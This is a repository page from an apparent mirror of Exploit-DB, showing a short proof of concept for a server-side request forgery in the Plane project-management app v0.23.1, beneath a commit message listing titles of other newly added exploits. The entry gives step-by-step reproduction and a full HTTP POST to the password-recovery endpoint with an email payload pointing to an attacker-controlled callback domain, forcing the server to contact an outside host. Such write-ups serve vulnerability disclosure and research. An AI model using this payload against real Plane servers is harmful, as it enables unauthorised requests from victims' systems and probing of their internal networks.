bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52211.txt
Exploit-DB b905517ca9 DB: 2025-04-16 
22 changes to exploits/shellcodes/ghdb

Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure

ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection

Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
ABB Cylon Aspect 3.08.03 - Hard-coded Secrets

Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
IBMi Navigator 7.5 -  HTTP Security Token Bypass
IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)

Plane 0.23.1 - Server side request forgery (SSRF)
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning

Cacti 1.2.26 -  Remote Code Execution (RCE) (Authenticated)

OpenCMS 17.0 - Stored Cross Site Scripting (XSS)

Really Simple Security 9.1.1.1 - Authentication Bypass

Pymatgen 2024.1 - Remote Code Execution (RCE)
2025-04-16 00:16:24 +00:00

30 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64
Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.
Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control:
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
Send the request:
POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62
{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}
3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.
Reference in a new issue View git blame Copy permalink